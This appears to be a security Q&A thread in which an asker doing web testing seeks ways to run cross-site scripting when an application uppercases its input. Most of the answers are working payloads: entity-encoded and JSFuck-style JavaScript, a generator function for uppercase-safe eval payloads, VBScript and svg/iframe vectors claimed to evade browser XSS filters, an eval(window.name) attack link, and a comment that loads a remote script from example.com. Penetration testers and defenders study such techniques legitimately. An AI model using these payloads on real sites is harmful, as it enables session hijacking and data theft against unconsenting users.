# How can I execute a XSS when a web application transforms a data from lowercase to uppercase?

Tags: web-application, xss

I'm testing a web application, when I send an input data to web application, this places the data in an `onclick` function, something like this:

```
<a href="#" onclick="someFunction('dataFromServer', '0');">link</a>
```

But, the web application transforms that data from lowercase to uppercase, then if I replace `dataFromServer` for `','0');alert('XSS');someFunction('`, I have the following result:

```
<a href="#" onclick="someFunction('','0');ALERT('XSS');SOMEFUNCTION('', '0');">link</a>
```

So, my XSS exploit doesn't work, because, the browser says "ALERT is undefined", I have tested on Firefox and IE.

Is there some way to execute a XSS in this case?

Comment: Knowing nothing about XSS, I think it's funny that this might be a legitimate way to block it

Comment: I would suggest trying `');"><script src="PATHTOSCRIPTELSEWHERE" /><i a="` or similar - break out of the onclick context.

Comment: I tried `');"><script src="PATHTOSCRIPTELSEWHERE" /><i a="` but the web application encodes `<` and `>`, then it doesn't work.

Comment: This question sounds like a "help me hack this" type post and not a "can they break my XSS protection" type post.

Comment: This is part of my job, I'm auhorized to do this kind of tests, but I have never had a case like this and I think there is a way, for this reason, I answered this question.

Answer (score 9, accepted):

You can encode the letters using ampersand and numbers (html encoding). `a = &#x41;` or `&#x65;` and so on.

JavaScript code can be encoded without using alphanumeric characters. The easiest way to do this is to check out: http://www.jsfuck.com/
This site can encode it for you.

Comment: I liked it, it's a good option, but the web application validates the lenght, it allows 100 characters as maximun, thanks. Also I knew the first option, but the web application encodes the ampersand.

Comment: I found another input with the same fewatures, but this allows more characters, then your solution helped me, thanks!!!!

Comment: You can even call `$.getScript()` if the application has jQuery installed like so to avoid any filters: `$["\x67\x65\x74\x53\x63\x72\x69\x70\x74"]("http://example.com/xss.js");`

Answer (score 4):

There is one (kind of old-school) way you can do this which may or may not be relevant to your case, depending on the application's user base.

VBScript works ok in Internet Explorer 10 and earlier and it is case insensitive, so something like

`<IMG SRC='vbscript:msgbox("XSS")'>`

might work ok.

Comment: I'm testing on IE 11, but I tried and it doesn't work, therefor the web application thansforms all text: `<IMG SRC='VBSCRIPT:MSGBOX("XSS")'>`. Thanks.

Comment: @hmrojas.p: If VBScript is enabled this should work because VBScript is case insensitive.

Answer (score 1):

## Automatic Payload Generation

I made a website for us that converts arbitrary JS to full-UPPERCASE or full-lowercase: https://arinerron.github.io/case-insensitive-xss/index.html

#### Dynamic Payload Generation

If you need to dynamically create case-insensitive JS, here is a function which automatically generates case insensitive XSS payloads given the JavaScript you want to execute:

```
var createPayload = function(js) {
    return ('"><script>[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]([][(![]+[])[+[]]+(![]+[])[!![]+!![]]+(![]+[])[+!![]]+(!![]+[])[+[]]][([]+[][(![]+[])[+[]]+(![]+[])[!![]+!![]]+(![]+[])[+!![]]+(!![]+[])[+[]]])[!![]+!![]+!![]]+(!![]+[][(![]+[])[+[]]+(![]+[])[!![]+!![]]+(![]+[])[+!![]]+(!![]+[])[+[]]])[+!![]+[+[]]]+([][[]]+[])[+!![]]+(![]+[])[!![]+!![]+!![]]+(!![]+[])[+[]]+(!![]+[])[+!![]]+([][[]]+[])[+[]]+([]+[][(![]+[])[+[]]+(![]+[])[!![]+!![]]+(![]+[])[+!![]]+(!![]+[])[+[]]])[!![]+!![]+!![]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+(![]+[])[!![]+!![]]+(![]+[])[+!![]]+(!![]+[])[+[]]])[+!![]+[+[]]]+(!![]+[])[+!![]]]((!![]+[])[+!![]]+(!![]+[])[!![]+!![]+!![]]+(!![]+[])[+[]]+([][[]]+[])[+[]]+(!![]+[])[+!![]]+([][[]]+[])[+!![]]+(![]+[][(![]+[])[+[]]+(![]+[])[!![]+!![]]+(![]+[])[+!![]]+(!![]+[])[+[]]])[!![]+!![]+[+[]]]+([][[]]+[])[!![]+!![]]+(!![]+[])[!![]+!![]+!![]]+([]+[][(![]+[])[+[]]+(![]+[])[!![]+!![]]+(![]+[])[+!![]]+(!![]+[])[+[]]])[!![]+!![]+!![]]+(!![]+[][(![]+[])[+[]]+(![]+[])[!![]+!![]]+(![]+[])[+!![]]+(!![]+[])[+[]]])[+!![]+[+[]]]+([][[]]+[])[!![]+!![]]+(!![]+[])[!![]+!![]+!![]]+[][(![]+[])[+[]]+(![]+[])[!![]+!![]]+(![]+[])[+!![]]+(!![]+[])[+[]]][([]+[][(![]+[])[+[]]+(![]+[])[!![]+!![]]+(![]+[])[+!![]]+(!![]+[])[+[]]])[!![]+!![]+!![]]+(!![]+[][(![]+[])[+[]]+(![]+[])[!![]+!![]]+(![]+[])[+!![]]+(!![]+[])[+[]]])[+!![]+[+[]]]+([][[]]+[])[+!![]]+(![]+[])[!![]+!![]+!![]]+(!![]+[])[+[]]+(!![]+[])[+!![]]+([][[]]+[])[+[]]+([]+[][(![]+[])[+[]]+(![]+[])[!![]+!![]]+(![]+[])[+!![]]+(!![]+[])[+[]]])[!![]+!![]+!![]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+(![]+[])[!![]+!![]]+(![]+[])[+!![]]+(!![]+[])[+[]]])[+!![]+[+[]]]+(!![]+[])[+!![]]]((!![]+[])[+!![]]+(!![]+[])[!![]+!![]+!![]]+(!![]+[])[+[]]+([][[]]+[])[+[]]+(!![]+[])[+!![]]+([][[]]+[])[+!![]]+(![]+[][(![]+[])[+[]]+(![]+[])[!![]+!![]]+(![]+[])[+!![]]+(!![]+[])[+[]]])[!![]+!![]+[+[]]]+([][(!![]+[])[!![]+!![]+!![]]+([][[]]+[])[+!![]]+(!![]+[])[+[]]+(!![]+[])[+!![]]+([![]]+[][[]])[+!![]+[+[]]]+(!![]+[])[!![]+!![]+!![]]+(![]+[])[!![]+!![]+!![]]]()+[])[!![]+!![]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+(![]+[])[!![]+!![]]+(![]+[])[+!![]]+(!![]+[])[+[]]])[+!![]+[+[]]]+(![]+[])[+!![]])()(+!![]+[+[![]]])[+!![]]+[][(![]+[])[+[]]+(![]+[])[!![]+!![]]+(![]+[])[+!![]]+(!![]+[])[+[]]][([]+[][(![]+[])[+[]]+(![]+[])[!![]+!![]]+(![]+[])[+!![]]+(!![]+[])[+[]]])[!![]+!![]+!![]]+(!![]+[][(![]+[])[+[]]+(![]+[])[!![]+!![]]+(![]+[])[+!![]]+(!![]+[])[+[]]])[+!![]+[+[]]]+([][[]]+[])[+!![]]+(![]+[])[!![]+!![]+!![]]+(!![]+[])[+[]]+(!![]+[])[+!![]]+([][[]]+[])[+[]]+([]+[][(![]+[])[+[]]+(![]+[])[!![]+!![]]+(![]+[])[+!![]]+(!![]+[])[+[]]])[!![]+!![]+!![]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+(![]+[])[!![]+!![]]+(![]+[])[+!![]]+(!![]+[])[+[]]])[+!![]+[+[]]]+(!![]+[])[+!![]]]((!![]+[])[+!![]]+(!![]+[])[!![]+!![]+!![]]+(!![]+[])[+[]]+([][[]]+[])[+[]]+(!![]+[])[+!![]]+([][[]]+[])[+!![]]+(![]+[][(![]+[])[+[]]+(![]+[])[!![]+!![]]+(![]+[])[+!![]]+(!![]+[])[+[]]])[!![]+!![]+[+[]]]+([][(!![]+[])[!![]+!![]+!![]]+([][[]]+[])[+!![]]+(!![]+[])[+[]]+(!![]+[])[+!![]]+([![]]+[][[]])[+!![]+[+[]]]+(!![]+[])[!![]+!![]+!![]]+(![]+[])[!![]+!![]+!![]]]()+[])[!![]+!![]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+(![]+[])[!![]+!![]]+(![]+[])[+!![]]+(!![]+[])[+[]]])[+!![]+[+[]]]+(![]+[])[+!![]])()(+[]+[!![]])[!![]+!![]]+(+(+!![]+(!![]+[])[!![]+!![]+!![]]+(+!![])+(+[])+(+[])+(+[]))+[])[+[]]+[][(![]+[])[+[]]+(![]+[])[!![]+!![]]+(![]+[])[+!![]]+(!![]+[])[+[]]][([]+[][(![]+[])[+[]]+(![]+[])[!![]+!![]]+(![]+[])[+!![]]+(!![]+[])[+[]]])[!![]+!![]+!![]]+(!![]+[][(![]+[])[+[]]+(![]+[])[!![]+!![]]+(![]+[])[+!![]]+(!![]+[])[+[]]])[+!![]+[+[]]]+([][[]]+[])[+!![]]+(![]+[])[!![]+!![]+!![]]+(!![]+[])[+[]]+(!![]+[])[+!![]]+([][[]]+[])[+[]]+([]+[][(![]+[])[+[]]+(![]+[])[!![]+!![]]+(![]+[])[+!![]]+(!![]+[])[+[]]])[!![]+!![]+!![]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+(![]+[])[!![]+!![]]+(![]+[])[+!![]]+(!![]+[])[+[]]])[+!![]+[+[]]]+(!![]+[])[+!![]]]((!![]+[])[+!![]]+(!![]+[])[!![]+!![]+!![]]+(!![]+[])[+[]]+([][[]]+[])[+[]]+(!![]+[])[+!![]]+([][[]]+[])[+!![]]+(![]+[][(![]+[])[+[]]+(![]+[])[!![]+!![]]+(![]+[])[+!![]]+(!![]+[])[+[]]])[!![]+!![]+[+[]]]+(![]+[])[+!![]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+(![]+[])[!![]+!![]]+(![]+[])[+!![]]+(!![]+[])[+[]]])[+!![]+[+[]]]+([][(!![]+[])[!![]+!![]+!![]]+([][[]]+[])[+!![]]+(!![]+[])[+[]]+(!![]+[])[+!![]]+([![]]+[][[]])[+!![]+[+[]]]+(!![]+[])[!![]+!![]+!![]]+(![]+[])[!![]+!![]+!![]]]()+[])[!![]+!![]])()(+[]+[+[]]+(+[![]])+![])[+!![]]+(+(!![]+!![]+[+[]]+(+[])+(!![]+!![]+!![]+!![]+!![])+(!![]+!![]+!![]+!![]+!![]+!![]+!![])+(!![]+!![])+(!![]+!![]+!![]+!![])+(!![]+!![]+!![])))[(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+(![]+[])[!![]+!![]]+(![]+[])[+!![]]+(!![]+[])[+[]]])[+!![]+[+[]]]+([]+[])[([]+[][(![]+[])[+[]]+(![]+[])[!![]+!![]]+(![]+[])[+!![]]+(!![]+[])[+[]]])[!![]+!![]+!![]]+(!![]+[][(![]+[])[+[]]+(![]+[])[!![]+!![]]+(![]+[])[+!![]]+(!![]+[])[+[]]])[+!![]+[+[]]]+([][[]]+[])[+!![]]+(![]+[])[!![]+!![]+!![]]+(!![]+[])[+[]]+(!![]+[])[+!![]]+([][[]]+[])[+[]]+([]+[][(![]+[])[+[]]+(![]+[])[!![]+!![]]+(![]+[])[+!![]]+(!![]+[])[+[]]])[!![]+!![]+!![]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+(![]+[])[!![]+!![]]+(![]+[])[+!![]]+(!![]+[])[+[]]])[+!![]+[+[]]]+(!![]+[])[+!![]]][([][[]]+[])[+!![]]+(![]+[])[+!![]]+([]+(+[])[([]+[][(![]+[])[+[]]+(![]+[])[!![]+!![]]+(![]+[])[+!![]]+(!![]+[])[+[]]])[!![]+!![]+!![]]+(!![]+[][(![]+[])[+[]]+(![]+[])[!![]+!![]]+(![]+[])[+!![]]+(!![]+[])[+[]]])[+!![]+[+[]]]+([][[]]+[])[+!![]]+(![]+[])[!![]+!![]+!![]]+(!![]+[])[+[]]+(!![]+[])[+!![]]+([][[]]+[])[+[]]+([]+[][(![]+[])[+[]]+(![]+[])[!![]+!![]]+(![]+[])[+!![]]+(!![]+[])[+[]]])[!![]+!![]+!![]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+(![]+[])[!![]+!![]]+(![]+[])[+!![]]+(!![]+[])[+[]]])[+!![]+[+[]]]+(!![]+[])[+!![]]])[+!![]+[+!![]]]+(!![]+[])[!![]+!![]+!![]]]](!![]+!![]+!![]+[+[]])+(!![]+[])[!![]+!![]+!![]]+([][[]]+[])[+!![]]+(!![]+[])[+[]])()("' + (function(s){return encodeURIComponent(s).replace(/[!'()*a-z]/g,(c)=>{return '%'+c.charCodeAt(0).toString(16)})})(js) + '"))()</script>').toUpperCase();
}
```

For example, you can generate a payload to call `alert(1)` by running that function:

```
var payload = createPayload('alert(1)');
```

## Manual Payload Creation

1. Use the following function to URL encode whatever JavaScript code you would like to execute (no restrictions):

```
var encodeUpper = (function(s){return encodeURIComponent(s).replace(/[!'()*a-z]/g,(c)=>{return '%'+c.charCodeAt(0).toString(16)})});

// example:
encodeUpper('asdfABC')
```

2. The following script is equivalent to `eval(decodeURIComponent("alert%281%29"))`. So, replace the `"alert%281%29"` string at the end of the following script with the URL encoded string you just created:

```
[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]([][(![]+[])[+[]]+(![]+[])[!![]+!![]]+(![]+[])[+!![]]+(!![]+[])[+[]]][([]+[][(![]+[])[+[]]+(![]+[])[!![]+!![]]+(![]+[])[+!![]]+(!![]+[])[+[]]])[!![]+!![]+!![]]+(!![]+[][(![]+[])[+[]]+(![]+[])[!![]+!![]]+(![]+[])[+!![]]+(!![]+[])[+[]]])[+!![]+[+[]]]+([][[]]+[])[+!![]]+(![]+[])[!![]+!![]+!![]]+(!![]+[])[+[]]+(!![]+[])[+!![]]+([][[]]+[])[+[]]+([]+[][(![]+[])[+[]]+(![]+[])[!![]+!![]]+(![]+[])[+!![]]+(!![]+[])[+[]]])[!![]+!![]+!![]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+(![]+[])[!![]+!![]]+(![]+[])[+!![]]+(!![]+[])[+[]]])[+!![]+[+[]]]+(!![]+[])[+!![]]]((!![]+[])[+!![]]+(!![]+[])[!![]+!![]+!![]]+(!![]+[])[+[]]+([][[]]+[])[+[]]+(!![]+[])[+!![]]+([][[]]+[])[+!![]]+(![]+[][(![]+[])[+[]]+(![]+[])[!![]+!![]]+(![]+[])[+!![]]+(!![]+[])[+[]]])[!![]+!![]+[+[]]]+([][[]]+[])[!![]+!![]]+(!![]+[])[!![]+!![]+!![]]+([]+[][(![]+[])[+[]]+(![]+[])[!![]+!![]]+(![]+[])[+!![]]+(!![]+[])[+[]]])[!![]+!![]+!![]]+(!![]+[][(![]+[])[+[]]+(![]+[])[!![]+!![]]+(![]+[])[+!![]]+(!![]+[])[+[]]])[+!![]+[+[]]]+([][[]]+[])[!![]+!![]]+(!![]+[])[!![]+!![]+!![]]+[][(![]+[])[+[]]+(![]+[])[!![]+!![]]+(![]+[])[+!![]]+(!![]+[])[+[]]][([]+[][(![]+[])[+[]]+(![]+[])[!![]+!![]]+(![]+[])[+!![]]+(!![]+[])[+[]]])[!![]+!![]+!![]]+(!![]+[][(![]+[])[+[]]+(![]+[])[!![]+!![]]+(![]+[])[+!![]]+(!![]+[])[+[]]])[+!![]+[+[]]]+([][[]]+[])[+!![]]+(![]+[])[!![]+!![]+!![]]+(!![]+[])[+[]]+(!![]+[])[+!![]]+([][[]]+[])[+[]]+([]+[][(![]+[])[+[]]+(![]+[])[!![]+!![]]+(![]+[])[+!![]]+(!![]+[])[+[]]])[!![]+!![]+!![]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+(![]+[])[!![]+!![]]+(![]+[])[+!![]]+(!![]+[])[+[]]])[+!![]+[+[]]]+(!![]+[])[+!![]]]((!![]+[])[+!![]]+(!![]+[])[!![]+!![]+!![]]+(!![]+[])[+[]]+([][[]]+[])[+[]]+(!![]+[])[+!![]]+([][[]]+[])[+!![]]+(![]+[][(![]+[])[+[]]+(![]+[])[!![]+!![]]+(![]+[])[+!![]]+(!![]+[])[+[]]])[!![]+!![]+[+[]]]+([][(!![]+[])[!![]+!![]+!![]]+([][[]]+[])[+!![]]+(!![]+[])[+[]]+(!![]+[])[+!![]]+([![]]+[][[]])[+!![]+[+[]]]+(!![]+[])[!![]+!![]+!![]]+(![]+[])[!![]+!![]+!![]]]()+[])[!![]+!![]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+(![]+[])[!![]+!![]]+(![]+[])[+!![]]+(!![]+[])[+[]]])[+!![]+[+[]]]+(![]+[])[+!![]])()(+!![]+[+[![]]])[+!![]]+[][(![]+[])[+[]]+(![]+[])[!![]+!![]]+(![]+[])[+!![]]+(!![]+[])[+[]]][([]+[][(![]+[])[+[]]+(![]+[])[!![]+!![]]+(![]+[])[+!![]]+(!![]+[])[+[]]])[!![]+!![]+!![]]+(!![]+[][(![]+[])[+[]]+(![]+[])[!![]+!![]]+(![]+[])[+!![]]+(!![]+[])[+[]]])[+!![]+[+[]]]+([][[]]+[])[+!![]]+(![]+[])[!![]+!![]+!![]]+(!![]+[])[+[]]+(!![]+[])[+!![]]+([][[]]+[])[+[]]+([]+[][(![]+[])[+[]]+(![]+[])[!![]+!![]]+(![]+[])[+!![]]+(!![]+[])[+[]]])[!![]+!![]+!![]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+(![]+[])[!![]+!![]]+(![]+[])[+!![]]+(!![]+[])[+[]]])[+!![]+[+[]]]+(!![]+[])[+!![]]]((!![]+[])[+!![]]+(!![]+[])[!![]+!![]+!![]]+(!![]+[])[+[]]+([][[]]+[])[+[]]+(!![]+[])[+!![]]+([][[]]+[])[+!![]]+(![]+[][(![]+[])[+[]]+(![]+[])[!![]+!![]]+(![]+[])[+!![]]+(!![]+[])[+[]]])[!![]+!![]+[+[]]]+([][(!![]+[])[!![]+!![]+!![]]+([][[]]+[])[+!![]]+(!![]+[])[+[]]+(!![]+[])[+!![]]+([![]]+[][[]])[+!![]+[+[]]]+(!![]+[])[!![]+!![]+!![]]+(![]+[])[!![]+!![]+!![]]]()+[])[!![]+!![]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+(![]+[])[!![]+!![]]+(![]+[])[+!![]]+(!![]+[])[+[]]])[+!![]+[+[]]]+(![]+[])[+!![]])()(+[]+[!![]])[!![]+!![]]+(+(+!![]+(!![]+[])[!![]+!![]+!![]]+(+!![])+(+[])+(+[])+(+[]))+[])[+[]]+[][(![]+[])[+[]]+(![]+[])[!![]+!![]]+(![]+[])[+!![]]+(!![]+[])[+[]]][([]+[][(![]+[])[+[]]+(![]+[])[!![]+!![]]+(![]+[])[+!![]]+(!![]+[])[+[]]])[!![]+!![]+!![]]+(!![]+[][(![]+[])[+[]]+(![]+[])[!![]+!![]]+(![]+[])[+!![]]+(!![]+[])[+[]]])[+!![]+[+[]]]+([][[]]+[])[+!![]]+(![]+[])[!![]+!![]+!![]]+(!![]+[])[+[]]+(!![]+[])[+!![]]+([][[]]+[])[+[]]+([]+[][(![]+[])[+[]]+(![]+[])[!![]+!![]]+(![]+[])[+!![]]+(!![]+[])[+[]]])[!![]+!![]+!![]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+(![]+[])[!![]+!![]]+(![]+[])[+!![]]+(!![]+[])[+[]]])[+!![]+[+[]]]+(!![]+[])[+!![]]]((!![]+[])[+!![]]+(!![]+[])[!![]+!![]+!![]]+(!![]+[])[+[]]+([][[]]+[])[+[]]+(!![]+[])[+!![]]+([][[]]+[])[+!![]]+(![]+[][(![]+[])[+[]]+(![]+[])[!![]+!![]]+(![]+[])[+!![]]+(!![]+[])[+[]]])[!![]+!![]+[+[]]]+(![]+[])[+!![]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+(![]+[])[!![]+!![]]+(![]+[])[+!![]]+(!![]+[])[+[]]])[+!![]+[+[]]]+([][(!![]+[])[!![]+!![]+!![]]+([][[]]+[])[+!![]]+(!![]+[])[+[]]+(!![]+[])[+!![]]+([![]]+[][[]])[+!![]+[+[]]]+(!![]+[])[!![]+!![]+!![]]+(![]+[])[!![]+!![]+!![]]]()+[])[!![]+!![]])()(+[]+[+[]]+(+[![]])+![])[+!![]]+(+(!![]+!![]+[+[]]+(+[])+(!![]+!![]+!![]+!![]+!![])+(!![]+!![]+!![]+!![]+!![]+!![]+!![])+(!![]+!![])+(!![]+!![]+!![]+!![])+(!![]+!![]+!![])))[(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+(![]+[])[!![]+!![]]+(![]+[])[+!![]]+(!![]+[])[+[]]])[+!![]+[+[]]]+([]+[])[([]+[][(![]+[])[+[]]+(![]+[])[!![]+!![]]+(![]+[])[+!![]]+(!![]+[])[+[]]])[!![]+!![]+!![]]+(!![]+[][(![]+[])[+[]]+(![]+[])[!![]+!![]]+(![]+[])[+!![]]+(!![]+[])[+[]]])[+!![]+[+[]]]+([][[]]+[])[+!![]]+(![]+[])[!![]+!![]+!![]]+(!![]+[])[+[]]+(!![]+[])[+!![]]+([][[]]+[])[+[]]+([]+[][(![]+[])[+[]]+(![]+[])[!![]+!![]]+(![]+[])[+!![]]+(!![]+[])[+[]]])[!![]+!![]+!![]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+(![]+[])[!![]+!![]]+(![]+[])[+!![]]+(!![]+[])[+[]]])[+!![]+[+[]]]+(!![]+[])[+!![]]][([][[]]+[])[+!![]]+(![]+[])[+!![]]+([]+(+[])[([]+[][(![]+[])[+[]]+(![]+[])[!![]+!![]]+(![]+[])[+!![]]+(!![]+[])[+[]]])[!![]+!![]+!![]]+(!![]+[][(![]+[])[+[]]+(![]+[])[!![]+!![]]+(![]+[])[+!![]]+(!![]+[])[+[]]])[+!![]+[+[]]]+([][[]]+[])[+!![]]+(![]+[])[!![]+!![]+!![]]+(!![]+[])[+[]]+(!![]+[])[+!![]]+([][[]]+[])[+[]]+([]+[][(![]+[])[+[]]+(![]+[])[!![]+!![]]+(![]+[])[+!![]]+(!![]+[])[+[]]])[!![]+!![]+!![]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+(![]+[])[!![]+!![]]+(![]+[])[+!![]]+(!![]+[])[+[]]])[+!![]+[+[]]]+(!![]+[])[+!![]]])[+!![]+[+!![]]]+(!![]+[])[!![]+!![]+!![]]]](!![]+!![]+!![]+[+[]])+(!![]+[])[!![]+!![]+!![]]+([][[]]+[])[+!![]]+(!![]+[])[+[]])()("alert%281%29"))()
```

3. `<SCRIPT>` tags (well, all HTML tags) are case-insensitive. Therefore, you can just wrap your payload with `<script>$payload</script>` now.
4. That is your payload. Have fun!

Answer (score 0):

In your example, you are already in a HTML attribute context so you should just be able to HTML-encode your payload. The browser will decode it for you before passing it to the Javascript engine.

`onclick="&#x61;&#x6C;&#x65;&#x72;&#x74;&#x28;&#x31;&#x29;"` will execute alert(1) when clicked on.

If there is a length limitation of 100 characters you can use the following pyaload:

`&#x65;&#x76;&#x61;&#x6C;(&#x6E;&#x61;&#x6D;&#x65;)` which translates to `eval(name)`

You can set name, or window.name, via for example target attribute of an a-tag:

`<a target="alert(1)" href="http://vulnerable.com/?xss=%26%23x65%3B%26%23x76%3B%26%23x61%3B%26%23x6C%3B%28%26%23x6E%3B%26%23x61%3B%26%23x6D%3B%26%23x65%3B%29">Click to XSS</a>`

Three other examples:

- `<iframe srcdoc="<SCRIPT>&#x61;&#x6C;&#x65;&#x72;&#x74;&#x28;&#x31;&#x29;</iframe>">`
- `<svg><script>&#x61;&#x6C;&#x65;&#x72;&#x74;&#x28;&#x31;&#x29;</script></svg>`
- `` ">`]]>-&#x61;&#x6C;&#x65;&#x72;&#x74;&#x28;&#x31;&#x29;</SCRIPT></SVG><SVG><SCRIPT>`<![CDATA[ ``

Last one works when page contains a double+ reflection and it will bypass browser XSS filters.

Note: `&#x61;&#x6C;&#x65;&#x72;&#x74;&#x28;&#x31;&#x29;` = alert(1) when HTML/XML-entity decoded